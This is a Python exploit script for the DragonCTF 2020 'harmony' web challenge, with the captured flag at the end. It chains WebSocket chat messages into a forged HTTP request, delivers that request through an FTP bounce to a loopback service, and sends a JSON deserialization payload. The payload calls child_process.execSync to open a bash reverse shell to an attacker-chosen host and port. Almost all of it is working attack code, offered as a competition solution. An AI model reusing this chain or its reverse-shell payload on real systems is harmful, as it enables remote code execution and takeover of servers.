DragonCTF 2020 - Web
import asyncio
import contextlib
import json
import socket

import websockets
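host = "ws://harmony-1.hackable.software:3380/chat"

# Reverse-shell listener. Fill these in before running. The defaults are the
# original placeholders, kept verbatim so the payload bytes are unchanged.
LHOST = "<host>"
LPORT = "<port>"

# JSON body of the forged `POST /csp-report` request that exp() assembles.
# The "___js-to-json-class___": "Function" marker looks like a hook for a
# class-reviving JSON deserializer on the server; the "json" string is
# apparently evaluated as a Function body and spawns a reverse shell through
# child_process.execSync. Two things about the literal are deliberate:
#   * there is one more '}' than '{' -- the extra brace apparently closes the
#     '{"csp-report": ' prefix that the chat-log line supplies in exp()
#     (exp() adds 15 == len('{"csp-report": ') to len(payload) for
#     Content-Length), so do not "fix" the braces or reformat the string;
#   * the bash -c argument is wrapped in plain single quotes at runtime
#     (the original literal escaped them as \').
payload = (
    '{"script-sample":{"toString":{"___js-to-json-class___":"Function",'
    + '"json":"console.log(global.process.mainModule.require(`child_process`)'
    + ".execSync(`bash -c 'bash -i >& /dev/tcp/" + LHOST + "/" + LPORT + " 0>&1'`))\"}},"
    + '"document-uri":"a","referrer":"b","violated-directive":"c",'
    + '"effective-directive":"d","original-policy":"e","disposition":"f",'
    + '"blocked-uri":"g","line-number":1,"source-file":"1","status-code":"a"}}'
)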
def register(username):
    """Return the JSON text of a `register` message for display name `username`."""
    return json.dumps({"type": "register", "displayName": username})
def new_channel(name):
    """Return the JSON text of a `new-channel` message creating channel `name`."""
    msg = {"type": "new-channel", "name": name}
    return json.dumps(msg)
def invite(chId, uid):
    """Return the JSON text of an `invite` message adding user `uid` to channel `chId`."""
    return json.dumps({"type": "invite", "chId": chId, "uid": uid})
def send_message(chId, msg):
    """Return the JSON text of a `message` posting `msg` into channel `chId`."""
    body = {"type": "message", "chId": chId, "msg": msg}
    return json.dumps(body)
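async def _add_log_line(stack, main_ws, main_chId, display_name, messages):
    """Create a throwaway chat user and post `messages` into the exploit channel.

    The user's display name and each message end up as text in the channel
    log, which the FTP step later pushes at the HTTP service; the caller
    picks names and messages so that the log reads as an HTTP request.

    The new WebSocket client is registered on `stack` (an AsyncExitStack)
    rather than closed here, so every helper client stays connected until
    the whole exploit has run -- the same send/recv ordering and disconnect
    timing as the original nested `async with` blocks.

    Returns the uid the server assigned to the new user.
    """
    ws = await stack.enter_async_context(websockets.connect(host))
    await ws.send(register(display_name))
    data = await ws.recv()
    await ws.recv()  # second frame after register is unused; drained to stay in sync
    uid = json.loads(data)["uid"]
    await main_ws.send(invite(main_chId, uid))
    await main_ws.recv()
    await ws.recv()  # drain the frame the invited client receives (presumably the invite)
    for msg in messages:
        await ws.send(send_message(main_chId, msg))
        await ws.recv()
    return uid


async def exp():
    """Run the exploit chain against the target (network side effects only).

    1. Register a main user and create the channel "exp".
    2. Fill the channel log, one user/message per line, so the log reads as
       `POST /csp-report` with a JSON body carrying `payload`.
    3. Log in to the FTP service as that user, PORT it at 127.0.0.1:3380
       and RETR the channel: the FTP server's data connection is bounced to
       the chat service on its own loopback and the log is delivered as an
       HTTP request (FTP bounce / FXP). Accepting a PORT to a loopback
       address is the FTP-side weakness this appears to rely on.

    Nothing is returned; on success a reverse shell connects to the
    LHOST/LPORT baked into `payload`.
    """
    async with websockets.connect(host) as main_ws, contextlib.AsyncExitStack() as stack:
        print("[+] Make Payload")
        await main_ws.send(register("tonikaku"))
        data = await main_ws.recv()
        await main_ws.recv()  # second frame is unused; drained to stay in sync
        main_uid = json.loads(data)["uid"]
        print("uid:", main_uid)

        # Channel whose log becomes the forged request.
        await main_ws.send(new_channel("exp"))
        data = await main_ws.recv()
        main_chId = json.loads(data)["channels"][0]["chId"]
        print("chId:", main_chId)

        # One (display name, messages) pair per log line. The line apparently
        # renders as "<name>: <msg>": that is why Content-Length adds 15
        # (== len('{"csp-report": ')) to the body and why `payload` carries
        # one extra closing brace. Keep names and messages exactly as-is.
        request_lines = [
            ("POST /csp-report?", ["HTTP/1.1"]),
            ("Host", ["localhost:3380"]),
            ("Content-Length", [str(len(payload) + 15)]),
            ("Content-Type", ["application/csp-report"]),
            # Empty message first ("Space" in the original; presumably the
            # header/body separator), then the body itself.
            ('{"csp-report"', ["", payload]),
        ]
        for display_name, messages in request_lines:
            await _add_log_line(stack, main_ws, main_chId, display_name, messages)
        print("[+] Payload created.")

        # FTP bounce. PORT 127,0,0,1,13,52 -> 127.0.0.1:3380 (13*256+52), the
        # chat service's port as seen from the FTP host. Kept inside the
        # WebSocket contexts so every client is still connected while the
        # log is retrieved. The connection is a context manager so the socket
        # is closed even if a recv/send raises.
        with socket.create_connection(("harmony-1.hackable.software", 3321)) as s:
            s.recv(1024)  # banner
            s.sendall(f"user {main_uid}\n".encode())
            s.recv(1024)
            s.sendall(b"pass\n")  # empty password; the service evidently accepts it
            s.recv(1024)
            s.sendall(b"port 127,0,0,1,13,52\n")
            s.recv(1024)
            # Terminated like the other commands (the original sent it bare
            # and relied on the close); no reply is awaited, as before.
            s.sendall(f"retr {main_chId}\n".encode())
        print("[+] Done.")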
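if __name__ == "__main__":
    # asyncio.run() owns its own loop and tears it down; get_event_loop()
    # is deprecated for this use on newer interpreters. The guard keeps the
    # exploit from firing when the module is merely imported.
    asyncio.run(exp())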
# DrgnS{FTPIsFun,ButFXPIsFunner!}